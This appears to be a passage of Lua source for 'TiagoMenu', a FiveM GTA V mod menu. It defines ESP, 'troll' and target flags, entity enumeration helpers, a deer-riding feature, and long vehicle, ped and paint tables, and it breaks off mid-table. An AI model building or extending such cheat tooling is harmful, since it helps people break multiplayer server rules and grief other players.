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- print 'by TiagoModz'
- local Follow = false
- ESX = nil
- local untested = {
- state = false
- }
- local logged = true
- local run = {
- runstate = false ,
- scriptcheck = true ,
- troll = true
- }
- Citizen.CreateThread(
- function()
- while ESX == nil do
- TriggerEvent(
- 'esx:getSharedObject',
- function(c)
- ESX = c
- end
- )
- Citizen.Wait(1000)
- DisplayRadar(true)
- end
- end
- )
- local ffs = true
- local asstarget = nil
- local asshat = false
- local PedGuardPlayer = false
- local pedlist = {}
- local speedmit = false
- local aispeed = '50.0'
- local appid = '639257980126232637'
- local asset = 'rertegdf'
- local PlaceSelf = true
- local ESPDistanceOps = {50.0, 100.0, 500.0, 1000.0, 2000.0, 5000.0, 10000.0}
- local EspDistance = 500.0
- local SelectedPlayer
- local peds = { "a_c_boar", "a_c_killerwhale", "a_c_sharktiger", "csb_stripper_01" }
- local peds2 = { "s_m_y_baywatch_01", "a_m_m_acult_01", "ig_barry", "g_m_y_ballaeast_01", "u_m_y_babyd", "a_m_y_acult_01", "a_m_m_afriamer_01", "u_m_y_corpse_01", "s_m_m_armoured_02", "g_m_m_armboss_01", "g_m_y_armgoon_02", "s_m_y_blackops_03", "s_m_y_blackops_01", "s_m_y_prismuscl_01", "g_m_m_chemwork_01", "a_m_y_musclbeac_01", "csb_cop", "s_m_y_clown_01", "s_m_y_cop_01", "u_m_y_zombie_01" }
- local peds3 = { "cs_debra", "a_f_m_beach_01", "a_f_m_bodybuild_01", "a_f_m_business_02", "a_f_y_business_04", "mp_f_cocaine_01", "u_f_y_corpse_01", "mp_f_meth_01", "g_f_importexport_01", "a_f_y_vinewood_04", "a_m_m_tranvest_01", "a_m_m_tranvest_02", "ig_tracydisanto", "csb_stripper_02", "s_f_y_stripper_01", "a_f_m_soucentmc_01", "a_f_m_soucent_02", "u_f_y_poppymich", "ig_patricia", "s_f_y_cop_01" }
- local peds4 = { "a_c_husky", "a_c_cat_01", "a_c_boar", "a_c_sharkhammer", "a_c_coyote", "a_c_chimp", "a_c_chop", "a_c_cow", "a_c_deer", "a_c_dolphin", "a_c_fish", "a_c_hen", "a_c_humpback", "a_c_killerwhale", "a_c_mtlion", "a_c_pig", "a_c_pug", "a_c_rabbit_01", "a_c_retriever", "a_c_rhesus", "a_c_rottweiler", "a_c_sharktiger", "a_c_shepherd", "a_c_westy" }
- local vehicles = { "Freight", "Rhino", "Futo", "Vigilante", "Monster", "Panto", "Bus", "Dump", "CargoPlane" }
- local vehicleSpeed = { 1.0, 10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0, 110.0, 120.0, 130.0, 140.0, 150.0 }
- local currentVehicle = 1
- local selectedVehicle = 1
- local currentVehicleSpeed = 16
- local selectedVehicleSpeed = 16
- local currentBone = 1
- local selectedBone = 1
- local currentDamage = 1
- local selectedDamage = 1
- local currentPed = 1
- local selectedPed = 1
- local selectedPedd = 1
- local currentPedd = 1
- local selectedPeddd = 1
- local currentPeddd = 1
- local selectedPedddd = 1
- local currentPedddd = 1
- local currentBullet = 1
- local selectedBullet = 1
- function EnumerateEntities(initFunc, moveFunc, disposeFunc)
- return coroutine.wrap(function()
- local iter, id = initFunc()
- if not id or id == 0 then
- disposeFunc(iter)
- return
- end
- local enum = {handle = iter, destructor = disposeFunc}
- setmetatable(enum, entityEnumerator)
- local next = true
- repeat
- coroutine.yield(id)
- next, id = moveFunc(iter)
- until not next
- enum.destructor, enum.handle = nil, nil
- disposeFunc(iter)
- end)
- end
- function EnumerateObjects()
- return EnumerateEntities(FindFirstObject, FindNextObject, EndFindObject)
- end
- function EnumeratePeds()
- return EnumerateEntities(FindFirstPed, FindNextPed, EndFindPed)
- end
- function EnumerateVehicles()
- return EnumerateEntities(FindFirstVehicle, FindNextVehicle, EndFindVehicle)
- end
- function EnumeratePickups()
- return EnumerateEntities(FindFirstPickup, FindNextPickup, EndFindPickup)
- end
- function GetAllPeds()
- local peds123 = {}
- for ped in EnumeratePeds() do
- if DoesEntityExist(ped) then
- table.insert(peds123, ped)
- end
- end
- return peds123
- end
- local Deer = {
- Handle = nil,
- Invincible = false,
- Ragdoll = false,
- Marker = false,
- Speed = {
- Walk = 3.0,
- Run = 9.0,
- },
- }
- function GetNearbyPeds(X, Y, Z, Radius)
- local NearbyPeds = {}
- for Ped in EnumeratePeds() do
- if DoesEntityExist(Ped) then
- local PedPosition = GetEntityCoords(Ped, false)
- if Vdist(X, Y, Z, PedPosition.x, PedPosition.y, PedPosition.z) <= Radius then
- table.insert(NearbyPeds, Ped)
- end
- end
- end
- return NearbyPeds
- end
- function GetCoordsInfrontOfEntityWithDistance(Entity, Distance, Heading)
- local Coordinates = GetEntityCoords(Entity, false)
- local Head = (GetEntityHeading(Entity) + (Heading or 0.0)) * math.pi / 180.0
- return {x = Coordinates.x + Distance * math.sin(-1.0 * Head), y = Coordinates.y + Distance * math.cos(-1.0 * Head), z = Coordinates.z}
- end
- function GetGroundZ(X, Y, Z)
- if tonumber(X) and tonumber(Y) and tonumber(Z) then
- local _, GroundZ = GetGroundZFor_3dCoord(X + 0.0, Y + 0.0, Z + 0.0, Citizen.ReturnResultAnyway())
- return GroundZ
- else
- return 0.0
- end
- end
- function Deer.Destroy()
- local Ped = PlayerPedId()
- DetachEntity(Ped, true, false)
- ClearPedTasksImmediately(Ped)
- SetEntityAsNoLongerNeeded(Deer.Handle)
- DeletePed(Deer.Handle)
- if DoesEntityExist(Deer.Handle) then
- SetEntityCoords(Deer.Handle, 601.28948974609, -4396.9853515625, 384.98565673828)
- end
- Deer.Handle = nil
- end
- function Deer.Create()
- local Model = GetHashKey("a_c_deer")
- RequestModel(Model)
- while not HasModelLoaded(Model) do
- Citizen.Wait(50)
- end
- local Ped = PlayerPedId()
- local PedPosition = GetEntityCoords(Ped, false)
- Deer.Handle = CreatePed(28, Model, PedPosition.x+1, PedPosition.y, PedPosition.z, GetEntityHeading(Ped), true, false)
- SetPedCanRagdoll(Deer.Handle, Deer.Ragdoll)
- SetEntityInvincible(Deer.Handle, Deer.Invincible)
- SetModelAsNoLongerNeeded(Model)
- end
- function Deer.Attach()
- local Ped = PlayerPedId()
- FreezeEntityPosition(Deer.Handle, true)
- FreezeEntityPosition(Ped, true)
- local DeerPosition = GetEntityCoords(Deer.Handle, false)
- SetEntityCoords(Ped, DeerPosition.x, DeerPosition.y, DeerPosition.z)
- AttachEntityToEntity(Ped, Deer.Handle, GetPedBoneIndex(Deer.Handle, 24816), -0.3, 0.0, 0.3, 0.0, 0.0, 90.0, false, false, false, true, 2, true)
- TaskPlayAnim(Ped, "rcmjosh2", "josh_sitting_loop", 8.0, 1, -1, 2, 1.0, 0, 0, 0)
- FreezeEntityPosition(Deer.Handle, false)
- FreezeEntityPosition(Ped, false)
- end
- function Deer.Ride()
- local Ped = PlayerPedId()
- local PedPosition = GetEntityCoords(Ped, false)
- if IsPedSittingInAnyVehicle(Ped) or IsPedGettingIntoAVehicle(Ped) then
- return
- end
- local AttachedEntity = GetEntityAttachedTo(Ped)
- if IsEntityAttached(Ped) and GetEntityModel(AttachedEntity) == GetHashKey("a_c_deer") then
- local SideCoordinates = GetCoordsInfrontOfEntityWithDistance(AttachedEntity, 1.0, 90.0)
- local SideHeading = GetEntityHeading(AttachedEntity)
- SideCoordinates.z = GetGroundZ(SideCoordinates.x, SideCoordinates.y, SideCoordinates.z)
- Deer.Handle = nil
- DetachEntity(Ped, true, false)
- ClearPedTasksImmediately(Ped)
- SetEntityCoords(Ped, SideCoordinates.x, SideCoordinates.y, SideCoordinates.z)
- SetEntityHeading(Ped, SideHeading)
- else
- for _, Ped in pairs(GetNearbyPeds(PedPosition.x, PedPosition.y, PedPosition.z, 2.0)) do
- if GetEntityModel(Ped) == GetHashKey("a_c_deer") then
- Deer.Handle = Ped
- Deer.Attach()
- break
- end
- end
- end
- end
- Citizen.CreateThread(function()
- RequestAnimDict("rcmjosh2")
- while not HasAnimDictLoaded("rcmjosh2") do
- Citizen.Wait(250)
- end
- while true do
- Citizen.Wait(0)
- local Ped = PlayerPedId()
- local AttachedEntity = GetEntityAttachedTo(Ped)
- if (not IsPedSittingInAnyVehicle(Ped) or not IsPedGettingIntoAVehicle(Ped)) and IsEntityAttached(Ped) and AttachedEntity == Deer.Handle then
- if DoesEntityExist(Deer.Handle) then
- local LeftAxisXNormal, LeftAxisYNormal = GetControlNormal(2, 218), GetControlNormal(2, 219)
- local Speed, Range = Deer.Speed.Walk, 4000.0
- local GoToOffset = GetOffsetFromEntityInWorldCoords(Deer.Handle, LeftAxisXNormal * Range, LeftAxisYNormal * -1.0 * Range, 0.0)
- TaskLookAtCoord(Deer.Handle, GoToOffset.x, GoToOffset.y, GoToOffset.z, 0, 0, 2)
- TaskGoStraightToCoord(Deer.Handle, GoToOffset.x, GoToOffset.y, GoToOffset.z, Speed, 20000, 40000.0, 0.5)
- if Deer.Marker then
- DrawMarker(6, GoToOffset.x, GoToOffset.y, GoToOffset.z, 0, 0, 0, 0, 0, 0, 1.0, 1.0, 1.0, 255, 255, 255, 255, 0, 0, 2, 0, 0, 0, 0)
- end
- end
- end
- end
- end)
- function checkValidVehicleExtras()
- local ar = PlayerPedId()
- local as = GetVehiclePedIsIn(ar, false)
- local at = {}
- for i = 0, 50, 1 do
- if DoesExtraExist(as, i) then
- local au = '~h~Extra #' .. tostring(i)
- local E = 'OFF'
- if IsVehicleExtraTurnedOn(as, i) then
- E = 'ON'
- end
- local av = '~h~extra ' .. tostring(i)
- table.insert(
- at,
- {
- menuName = realModName,
- data = {['action'] = realSpawnName, ['state'] = E}
- }
- )
- end
- end
- return at
- end
- function DoesVehicleHaveExtras(veh)
- for i = 1, 30 do
- if DoesExtraExist(veh, i) then
- return true
- end
- end
- return false
- end
- function checkValidVehicleMods(aw)
- local ar = PlayerPedId()
- local as = GetVehiclePedIsIn(ar, false)
- local at = {}
- local ax = GetNumVehicleMods(as, aw)
- if aw == 48 and ax == 0 then
- local ax = GetVehicleLiveryCount(as)
- for i = 1, ax, 1 do
- local ay = i - 1
- local az = GetLiveryName(as, ay)
- local realModName = GetLabelText(az)
- local aA, realSpawnName = aw, ay
- at[i] = {
- menuName = realModName,
- data = {['modid'] = aA, ['realIndex'] = realSpawnName}
- }
- end
- end
- for i = 1, ax, 1 do
- local ay = i - 1
- local az = GetModTextLabel(as, aw, ay)
- local realModName = GetLabelText(az)
- local aA, realSpawnName = ax, ay
- at[i] = {
- menuName = realModName,
- data = {['modid'] = aA, ['realIndex'] = realSpawnName}
- }
- end
- if ax > 0 then
- local ay = -1
- local aA, realSpawnName = aw, ay
- table.insert(
- at,
- 1,
- {
- menuName = 'Stock',
- data = {['modid'] = aA, ['realIndex'] = realSpawnName}
- }
- )
- end
- return at
- end
- local aB = {
- 'Dinghy',
- 'Dinghy2',
- 'Dinghy3',
- 'Dingh4',
- 'Jetmax',
- 'Marquis',
- 'Seashark',
- 'Seashark2',
- 'Seashark3',
- 'Speeder',
- 'Speeder2',
- 'Squalo',
- 'Submersible',
- 'Submersible2',
- 'Suntrap',
- 'Toro',
- 'Toro2',
- 'Tropic',
- 'Tropic2',
- 'Tug'
- }
- local aC = {
- 'Benson',
- 'Biff',
- 'Cerberus',
- 'Cerberus2',
- 'Cerberus3',
- 'Hauler',
- 'Hauler2',
- 'Mule',
- 'Mule2',
- 'Mule3',
- 'Mule4',
- 'Packer',
- 'Phantom',
- 'Phantom2',
- 'Phantom3',
- 'Pounder',
- 'Pounder2',
- 'Stockade',
- 'Stockade3',
- 'Terbyte'
- }
- local aD = {
- 'Blista',
- 'Blista2',
- 'Blista3',
- 'Brioso',
- 'Dilettante',
- 'Dilettante2',
- 'Issi2',
- 'Issi3',
- 'issi4',
- 'Iss5',
- 'issi6',
- 'Panto',
- 'Prarire',
- 'Rhapsody'
- }
- local aE = {
- 'CogCabrio',
- 'Exemplar',
- 'F620',
- 'Felon',
- 'Felon2',
- 'Jackal',
- 'Oracle',
- 'Oracle2',
- 'Sentinel',
- 'Sentinel2',
- 'Windsor',
- 'Windsor2',
- 'Zion',
- 'Zion2'
- }
- local aF = {
- 'Bmx',
- 'Cruiser',
- 'Fixter',
- 'Scorcher',
- 'Tribike',
- 'Tribike2',
- 'tribike3'
- }
- local aG = {
- 'ambulance',
- 'FBI',
- 'FBI2',
- 'FireTruk',
- 'PBus',
- 'police',
- 'Police2',
- 'Police3',
- 'Police4',
- 'PoliceOld1',
- 'PoliceOld2',
- 'PoliceT',
- 'Policeb',
- 'Polmav',
- 'Pranger',
- 'Predator',
- 'Riot',
- 'Riot2',
- 'Sheriff',
- 'Sheriff2'
- }
- local aH = {
- 'Akula',
- 'Annihilator',
- 'Buzzard',
- 'Buzzard2',
- 'Cargobob',
- 'Cargobob2',
- 'Cargobob3',
- 'Cargobob4',
- 'Frogger',
- 'Frogger2',
- 'Havok',
- 'Hunter',
- 'Maverick',
- 'Savage',
- 'Seasparrow',
- 'Skylift',
- 'Supervolito',
- 'Supervolito2',
- 'Swift',
- 'Swift2',
- 'Valkyrie',
- 'Valkyrie2',
- 'Volatus'
- }
- local aI = {
- 'Bulldozer',
- 'Cutter',
- 'Dump',
- 'Flatbed',
- 'Guardian',
- 'Handler',
- 'Mixer',
- 'Mixer2',
- 'Rubble',
- 'Tiptruck',
- 'Tiptruck2'
- }
- local aJ = {
- 'APC',
- 'Barracks',
- 'Barracks2',
- 'Barracks3',
- 'Barrage',
- 'Chernobog',
- 'Crusader',
- 'Halftrack',
- 'Khanjali',
- 'Rhino',
- 'Scarab',
- 'Scarab2',
- 'Scarab3',
- 'Thruster',
- 'Trailersmall2'
- }
- local aK = {
- 'Akuma',
- 'Avarus',
- 'Bagger',
- 'Bati2',
- 'Bati',
- 'BF400',
- 'Blazer4',
- 'CarbonRS',
- 'Chimera',
- 'Cliffhanger',
- 'Daemon',
- 'Daemon2',
- 'Defiler',
- 'Deathbike',
- 'Deathbike2',
- 'Deathbike3',
- 'Diablous',
- 'Diablous2',
- 'Double',
- 'Enduro',
- 'esskey',
- 'Faggio2',
- 'Faggio3',
- 'Faggio',
- 'Fcr2',
- 'fcr',
- 'gargoyle',
- 'hakuchou2',
- 'hakuchou',
- 'hexer',
- 'innovation',
- 'Lectro',
- 'Manchez',
- 'Nemesis',
- 'Nightblade',
- 'Oppressor',
- 'Oppressor2',
- 'PCJ',
- 'Ratbike',
- 'Ruffian',
- 'Sanchez2',
- 'Sanchez',
- 'Sanctus',
- 'Shotaro',
- 'Sovereign',
- 'Thrust',
- 'Vader',
- 'Vindicator',
- 'Vortex',
- 'Wolfsbane',
- 'zombiea',
- 'zombieb'
- }
- local aL = {
- 'Blade',
- 'Buccaneer',
- 'Buccaneer2',
- 'Chino',
- 'Chino2',
- 'clique',
- 'Deviant',
- 'Dominator',
- 'Dominator2',
- 'Dominator3',
- 'Dominator4',
- 'Dominator5',
- 'Dominator6',
- 'Dukes',
- 'Dukes2',
- 'Ellie',
- 'Faction',
- 'faction2',
- 'faction3',
- 'Gauntlet',
- 'Gauntlet2',
- 'Hermes',
- 'Hotknife',
- 'Hustler',
- 'Impaler',
- 'Impaler2',
- 'Impaler3',
- 'Impaler4',
- 'Imperator',
- 'Imperator2',
- 'Imperator3',
- 'Lurcher',
- 'Moonbeam',
- 'Moonbeam2',
- 'Nightshade',
- 'Phoenix',
- 'Picador',
- 'RatLoader',
- 'RatLoader2',
- 'Ruiner',
- 'Ruiner2',
- 'Ruiner3',
- 'SabreGT',
- 'SabreGT2',
- 'Sadler2',
- 'Slamvan',
- 'Slamvan2',
- 'Slamvan3',
- 'Slamvan4',
- 'Slamvan5',
- 'Slamvan6',
- 'Stalion',
- 'Stalion2',
- 'Tampa',
- 'Tampa3',
- 'Tulip',
- 'Vamos,',
- 'Vigero',
- 'Virgo',
- 'Virgo2',
- 'Virgo3',
- 'Voodoo',
- 'Voodoo2',
- 'Yosemite'
- }
- local aM = {
- 'BFinjection',
- 'Bifta',
- 'Blazer',
- 'Blazer2',
- 'Blazer3',
- 'Blazer5',
- 'Bohdi',
- 'Brawler',
- 'Bruiser',
- 'Bruiser2',
- 'Bruiser3',
- 'Caracara',
- 'DLoader',
- 'Dune',
- 'Dune2',
- 'Dune3',
- 'Dune4',
- 'Dune5',
- 'Insurgent',
- 'Insurgent2',
- 'Insurgent3',
- 'Kalahari',
- 'Kamacho',
- 'LGuard',
- 'Marshall',
- 'Mesa',
- 'Mesa2',
- 'Mesa3',
- 'Monster',
- 'Monster4',
- 'Monster5',
- 'Nightshark',
- 'RancherXL',
- 'RancherXL2',
- 'Rebel',
- 'Rebel2',
- 'RCBandito',
- 'Riata',
- 'Sandking',
- 'Sandking2',
- 'Technical',
- 'Technical2',
- 'Technical3',
- 'TrophyTruck',
- 'TrophyTruck2',
- 'Freecrawler',
- 'Menacer'
- }
- local aN = {
- 'AlphaZ1',
- 'Avenger',
- 'Avenger2',
- 'Besra',
- 'Blimp',
- 'blimp2',
- 'Blimp3',
- 'Bombushka',
- 'Cargoplane',
- 'Cuban800',
- 'Dodo',
- 'Duster',
- 'Howard',
- 'Hydra',
- 'Jet',
- 'Lazer',
- 'Luxor',
- 'Luxor2',
- 'Mammatus',
- 'Microlight',
- 'Miljet',
- 'Mogul',
- 'Molotok',
- 'Nimbus',
- 'Nokota',
- 'Pyro',
- 'Rogue',
- 'Seabreeze',
- 'Shamal',
- 'Starling',
- 'Stunt',
- 'Titan',
- 'Tula',
- 'Velum',
- 'Velum2',
- 'Vestra',
- 'Volatol',
- 'Striekforce'
- }
- local aO = {
- 'BJXL',
- 'Baller',
- 'Baller2',
- 'Baller3',
- 'Baller4',
- 'Baller5',
- 'Baller6',
- 'Cavalcade',
- 'Cavalcade2',
- 'Dubsta',
- 'Dubsta2',
- 'Dubsta3',
- 'FQ2',
- 'Granger',
- 'Gresley',
- 'Habanero',
- 'Huntley',
- 'Landstalker',
- 'patriot',
- 'Patriot2',
- 'Radi',
- 'Rocoto',
- 'Seminole',
- 'Serrano',
- 'Toros',
- 'XLS',
- 'XLS2'
- }
- local aP = {
- 'Asea',
- 'Asea2',
- 'Asterope',
- 'Cog55',
- 'Cogg552',
- 'Cognoscenti',
- 'Cognoscenti2',
- 'emperor',
- 'emperor2',
- 'emperor3',
- 'Fugitive',
- 'Glendale',
- 'ingot',
- 'intruder',
- 'limo2',
- 'premier',
- 'primo',
- 'primo2',
- 'regina',
- 'romero',
- 'stafford',
- 'Stanier',
- 'stratum',
- 'stretch',
- 'surge',
- 'tailgater',
- 'warrener',
- 'Washington'
- }
- local aQ = {
- 'Airbus',
- 'Brickade',
- 'Bus',
- 'Coach',
- 'Rallytruck',
- 'Rentalbus',
- 'taxi',
- 'Tourbus',
- 'Trash',
- 'Trash2',
- 'WastIndr',
- 'PBus2'
- }
- local aR = {
- 'Alpha',
- 'Banshee',
- 'Banshee2',
- 'BestiaGTS',
- 'Buffalo',
- 'Buffalo2',
- 'Buffalo3',
- 'Carbonizzare',
- 'Comet2',
- 'Comet3',
- 'Comet4',
- 'Comet5',
- 'Coquette',
- 'Deveste',
- 'Elegy',
- 'Elegy2',
- 'Feltzer2',
- 'Feltzer3',
- 'FlashGT',
- 'Furoregt',
- 'Fusilade',
- 'Futo',
- 'GB200',
- 'Hotring',
- 'Infernus2',
- 'Italigto',
- 'Jester',
- 'Jester2',
- 'Khamelion',
- 'Kurama',
- 'Kurama2',
- 'TiagoMenu',
- 'MAssacro',
- 'MAssacro2',
- 'neon',
- 'Ninef',
- 'ninfe2',
- 'omnis',
- 'Pariah',
- 'Penumbra',
- 'Raiden',
- 'RapidGT',
- 'RapidGT2',
- 'Raptor',
- 'Revolter',
- 'Ruston',
- 'Schafter2',
- 'Schafter3',
- 'Schafter4',
- 'Schafter5',
- 'Schafter6',
- 'Schlagen',
- 'Schwarzer',
- 'Sentinel3',
- 'Seven70',
- 'Specter',
- 'Specter2',
- 'Streiter',
- 'Sultan',
- 'Surano',
- 'Tampa2',
- 'Tropos',
- 'Verlierer2',
- 'ZR380',
- 'ZR3802',
- 'ZR3803'
- }
- local aS = {
- 'Ardent',
- 'BType',
- 'BType2',
- 'BType3',
- 'Casco',
- 'Cheetah2',
- 'Cheburek',
- 'Coquette2',
- 'Coquette3',
- 'Deluxo',
- 'Fagaloa',
- 'Gt500',
- 'JB700',
- 'JEster3',
- 'MAmba',
- 'Manana',
- 'Michelli',
- 'Monroe',
- 'Peyote',
- 'Pigalle',
- 'RapidGT3',
- 'Retinue',
- 'Savastra',
- 'Stinger',
- 'Stingergt',
- 'Stromberg',
- 'Swinger',
- 'Torero',
- 'Tornado',
- 'Tornado2',
- 'Tornado3',
- 'Tornado4',
- 'Tornado5',
- 'Tornado6',
- 'Viseris',
- 'Z190',
- 'ZType'
- }
- local aT = {
- 'Adder',
- 'Autarch',
- 'Bullet',
- 'Cheetah',
- 'Cyclone',
- 'EntityXF',
- 'Entity2',
- 'FMJ',
- 'GP1',
- 'Infernus',
- 'LE7B',
- 'Nero',
- 'Nero2',
- 'Osiris',
- 'Penetrator',
- 'PFister811',
- 'Prototipo',
- 'Reaper',
- 'SC1',
- 'Scramjet',
- 'Sheava',
- 'SultanRS',
- 'Superd',
- 'T20',
- 'Taipan',
- 'Tempesta',
- 'Tezeract',
- 'Turismo2',
- 'Turismor',
- 'Tyrant',
- 'Tyrus',
- 'Vacca',
- 'Vagner',
- 'Vigilante',
- 'Visione',
- 'Voltic',
- 'Voltic2',
- 'Zentorno',
- 'Italigtb',
- 'Italigtb2',
- 'XA21'
- }
- local aU = {
- 'ArmyTanker',
- 'ArmyTrailer',
- 'ArmyTrailer2',
- 'BaleTrailer',
- 'BoatTrailer',
- 'CableCar',
- 'DockTrailer',
- 'Graintrailer',
- 'Proptrailer',
- 'Raketailer',
- 'TR2',
- 'TR3',
- 'TR4',
- 'TRFlat',
- 'TVTrailer',
- 'Tanker',
- 'Tanker2',
- 'Trailerlogs',
- 'Trailersmall',
- 'Trailers',
- 'Trailers2',
- 'Trailers3'
- }
- local aV = {
- 'Freight',
- 'Freightcar',
- 'Freightcont1',
- 'Freightcont2',
- 'Freightgrain',
- 'Freighttrailer',
- 'TankerCar'
- }
- local aW = {
- 'Airtug',
- 'Caddy',
- 'Caddy2',
- 'Caddy3',
- 'Docktug',
- 'Forklift',
- 'Mower',
- 'Ripley',
- 'Sadler',
- 'Scrap',
- 'TowTruck',
- 'Towtruck2',
- 'Tractor',
- 'Tractor2',
- 'Tractor3',
- 'TrailerLArge2',
- 'Utilitruck',
- 'Utilitruck3',
- 'Utilitruck2'
- }
- local aX = {
- 'Bison',
- 'Bison2',
- 'Bison3',
- 'BobcatXL',
- 'Boxville',
- 'Boxville2',
- 'Boxville3',
- 'Boxville4',
- 'Boxville5',
- 'Burrito',
- 'Burrito2',
- 'Burrito3',
- 'Burrito4',
- 'Burrito5',
- 'Camper',
- 'GBurrito',
- 'GBurrito2',
- 'Journey',
- 'Minivan',
- 'Minivan2',
- 'Paradise',
- 'pony',
- 'Pony2',
- 'Rumpo',
- 'Rumpo2',
- 'Rumpo3',
- 'Speedo',
- 'Speedo2',
- 'Speedo4',
- 'Surfer',
- 'Surfer2',
- 'Taco',
- 'Youga',
- 'youga2'
- }
- local aY = {
- 'Boats',
- 'Commercial',
- 'Compacts',
- 'Coupes',
- 'Cycles',
- 'Emergency',
- 'Helictopers',
- 'Industrial',
- 'Military',
- 'Motorcycles',
- 'Muscle',
- 'Off-Road',
- 'Planes',
- 'SUVs',
- 'Sedans',
- 'Service',
- 'Sports',
- 'Sports Classic',
- 'Super',
- 'Trailer',
- 'Trains',
- 'Utility',
- 'Vans'
- }
- local aZ = {
- aB,
- aC,
- aD,
- aE,
- aF,
- aG,
- aH,
- aI,
- aJ,
- aK,
- aL,
- aM,
- aN,
- aO,
- aP,
- aQ,
- aR,
- aS,
- aT,
- aU,
- aV,
- aW,
- aX
- }
- local b1 = false
- local b2 = false
- local b3 = false
- local b4 = false
- local b5 = nil
- local b6 = {}
- local b7 = {}
- local b8 = nil
- local b9 = false
- local ba = -1
- local bb = -1
- local bc = -1
- local bd = false
- local be = {
- {name = '~h~Spoilers', id = 0},
- {name = '~h~Front Bumper', id = 1},
- {name = '~h~Rear Bumper', id = 2},
- {name = '~h~Side Skirt', id = 3},
- {name = '~h~Exhaust', id = 4},
- {name = '~h~Frame', id = 5},
- {name = '~h~Grille', id = 6},
- {name = '~h~Hood', id = 7},
- {name = '~h~Fender', id = 8},
- {name = '~h~Right Fender', id = 9},
- {name = '~h~Roof', id = 10},
- {name = '~h~Vanity Plates', id = 25},
- {name = '~h~Trim', id = 27},
- {name = '~h~Ornaments', id = 28},
- {name = '~h~Dashboard', id = 29},
- {name = '~h~Dial', id = 30},
- {name = '~h~Door Speaker', id = 31},
- {name = '~h~Seats', id = 32},
- {name = '~h~Steering Wheel', id = 33},
- {name = '~h~Shifter Leavers', id = 34},
- {name = '~h~Plaques', id = 35},
- {name = '~h~Speakers', id = 36},
- {name = '~h~Trunk', id = 37},
- {name = '~h~Hydraulics', id = 38},
- {name = '~h~Engine Block', id = 39},
- {name = '~h~Air Filter', id = 40},
- {name = '~h~Struts', id = 41},
- {name = '~h~Arch Cover', id = 42},
- {name = '~h~Aerials', id = 43},
- {name = '~h~Trim 2', id = 44},
- {name = '~h~Tank', id = 45},
- {name = '~h~Windows', id = 46},
- {name = '~h~Livery', id = 48},
- {name = '~h~Wheels', id = 23},
- {name = '~h~~r~Wheel Types', id = 'wheeltypes'},
- {name = '~h~Extras', id = 'extra'},
- {name = '~h~~o~Neons', id = 'neon'},
- {name = '~h~~p~Paint', id = 'paint'}
- }
- local bf = {
- {name = '~h~~r~Engine', id = 11},
- {name = '~h~~b~Brakes', id = 12},
- {name = '~h~~g~Transmission', id = 13},
- {name = '~h~~y~Suspension', id = 15}
- }
- local bg = {
- ['White'] = {255, 255, 255},
- ['Blue'] = {0, 0, 255},
- ['Electric Blue'] = {0, 150, 255},
- ['Mint Green'] = {50, 255, 155},
- ['Lime Green'] = {0, 255, 0},
- ['Yellow'] = {255, 255, 0},
- ['Golden Shower'] = {204, 204, 0},
- ['Orange'] = {255, 128, 0},
- ['Red'] = {255, 0, 0},
- ['Pony Pink'] = {255, 102, 255},
- ['Hot Pink'] = {255, 0, 255},
- ['Purple'] = {153, 0, 153}
- }
- local bh = {
- {name = '~h~Black', id = 0},
- {name = '~h~Carbon Black', id = 147},
- {name = '~h~Graphite', id = 1},
- {name = '~h~Anhracite Black', id = 11},
- {name = '~h~Black Steel', id = 2},
- {name = '~h~Dark Steel', id = 3},
- {name = '~h~Silver', id = 4},
- {name = '~h~Bluish Silver', id = 5},
- {name = '~h~Rolled Steel', id = 6},
- {name = '~h~Shadow Silver', id = 7},
- {name = '~h~Stone Silver', id = 8},
- {name = '~h~Midnight Silver', id = 9},
- {name = '~h~Cast Iron Silver', id = 10},
- {name = '~h~Red', id = 27},
- {name = '~h~Torino Red', id = 28},
- {name = '~h~Formula Red', id = 29},
- {name = '~h~Lava Red', id = 150},
- {name = '~h~Blaze Red', id = 30},
- {name = '~h~Grace Red', id = 31},
- {name = '~h~Garnet Red', id = 32},
- {name = '~h~Sunset Red', id = 33},
- {name = '~h~Cabernet Red', id = 34},
- {name = '~h~Wine Red', id = 143},
- {name = '~h~Candy Red', id = 35},
- {name = '~h~Hot Pink', id = 135},
- {name = '~h~Pfsiter Pink', id = 137},
- {name = '~h~Salmon Pink', id = 136},
- {name = '~h~Sunrise Orange', id = 36},
- {name = '~h~Orange', id = 38},
- {name = '~h~Bright Orange', id = 138},
- {name = '~h~Gold', id = 99},
- {name = '~h~Bronze', id = 90},
- {name = '~h~Yellow', id = 88},
- {name = '~h~Race Yellow', id = 89},
- {name = '~h~Dew Yellow', id = 91},
- {name = '~h~Dark Green', id = 49},
- {name = '~h~Racing Green', id = 50},
- {name = '~h~Sea Green', id = 51},
- {name = '~h~Olive Green', id = 52},
- {name = '~h~Bright Green', id = 53},
- {name = '~h~Gasoline Green', id = 54},
- {name = '~h~Lime Green', id = 92},
- {name = '~h~Midnight Blue', id = 141},
- {name = '~h~Galaxy Blue', id = 61},
- {name = '~h~Dark Blue', id = 62},
- {name = '~h~Saxon Blue', id = 63},
- {name = '~h~Blue', id = 64},
- {name = '~h~Mariner Blue', id = 65},
- {name = '~h~Harbor Blue', id = 66},
- {name = '~h~Diamond Blue', id = 67},
- {name = '~h~Surf Blue', id = 68},
- {name = '~h~Nautical Blue', id = 69},
- {name = '~h~Racing Blue', id = 73},
- {name = '~h~Ultra Blue', id = 70},
- {name = '~h~Light Blue', id = 74},
- {name = '~h~Chocolate Brown', id = 96},
- {name = '~h~Bison Brown', id = 101},
- {name = '~h~Creeen Brown', id = 95},
- {name = '~h~Feltzer Brown', id = 94},
- {name = '~h~Maple Brown', id = 97},
- {name = '~h~Beechwood Brown', id = 103},
- {name = '~h~Sienna Brown', id = 104},
- {name = '~h~Saddle Brown', id = 98},
- {name = '~h~Moss Brown', id = 100},
- {name = '~h~Woodbeech Brown', id = 102},
- {name = '~h~Straw Brown', id = 99},
- {name = '~h~Sandy Brown', id = 105},
- {name = '~h~Bleached Brown', id = 106},
- {name = '~h~Schafter Purple', id = 71},
- {name = '~h~Spinnaker Purple', id = 72},
- {name = '~h~Midnight Purple', id = 142},
- {name = '~h~Bright Purple', id = 145},
- {name = '~h~Cream', id = 107},
- {name = '~h~Ice White', id = 111},
- {name = '~h~Frost White', id = 112}
- }
- local bi = '~u~TiagoMenu ~s~Official'
- local bj = {
- {name = '~h~Black', id = 12},
- {name = '~h~Gray', id = 13},
- {name = '~h~Light Gray', id = 14},
- {name = '~h~Ice White', id = 131},
- {name = '~h~Blue', id = 83},
- {name = '~h~Dark Blue', id = 82},
